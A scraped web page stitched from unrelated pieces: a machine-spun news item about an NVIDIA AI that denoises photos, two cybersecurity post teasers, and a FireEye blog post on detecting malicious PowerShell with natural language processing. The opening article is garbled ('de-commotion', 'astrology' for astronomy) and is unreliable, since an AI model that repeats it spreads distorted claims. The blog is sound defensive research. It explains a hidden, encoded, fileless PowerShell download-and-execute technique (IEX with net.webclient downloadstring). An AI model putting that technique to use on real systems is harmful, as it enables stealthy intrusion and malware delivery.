Subsequent to training their AI, the scientists/researchers tried it by utilizing three sets of pictures to which they'd included the noise and they found that the framework could de-commotion the photographs in milliseconds, creating a version just marginally milder looking than the first before the noise was included.

Researchers say their algorithm can be utilized to denoise old grainy photographs, remove content based watermarks, clear up medicinal X-ray examines taken with undersampled inputs, upgrading astronomical photography, and denoise artificially produced pictures.

This in any case, isn't the principal case of an AI that can enhance inferior photos and absolutely not the first time when NVIDIA's research team has been behind such an amazing exploration.

As in April, NVIDIA and different researchers made another AI-based algorithm that can recreate pictures from which substantial lumps of content has been expelled.
Also in May, NVIDIA and other kindred researchers made an AI algorithm that can encourage robots to do different tasks just by watching a couple of redundancies by human workers.

Despite the fact that it's not yet clear when or if, this product may end up accessible to the overall population. Be that as it may, when that day comes, the researchers trust that it could definitely be helpful for various applications whether it be from astrology to medical imaging.

Are security professionals moving fast enough?

Anthony O’Mara, from Malwarebytes, explains to Information Age why security professionals need to move much faster to beat cyber criminals. With the increase in threats the cybersecurity industry faces, alongside

The post Are security professionals moving fast enough? appeared first on The Cyber Security Place.

File-Based Malware: Considering A Different And Specific Security Approach

The cybersecurity solutions landscape has evolved from simple but effective signature-based scanning solutions to sandboxing—the isolating layer of security between your system and malware—and, most recently, to sophisticated detection methods.

The post File-Based Malware: Considering A Different And Specific Security Approach appeared first on The Cyber Security Place.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils a stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonym, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm will reduce the word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)

The overall NLP pipeline we developed is captured in the following table:

NLP Key Modules

Functionality

Decoder

Detect and decode any encoded text

Named Entity Recognition (NER)

Detect and recognize any entities such as IP, URL, Email, Registry key, etc.

Tokenizer

Tokenize the PowerShell command into a list of tokens

Stemmer

Stem tokens into semantically identical token, uses trie

Vocabulary Vectorizer

Vectorize the list of tokens into machine learning friendly format

Supervised classifier

Binary classification algorithms:

  • Kernel Support Vector Machine
  • Gradient Boosted Trees
  • Deep Neural Networks

Reasoning

The explanation of why the prediction was made. Enables analysts to validate predications.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.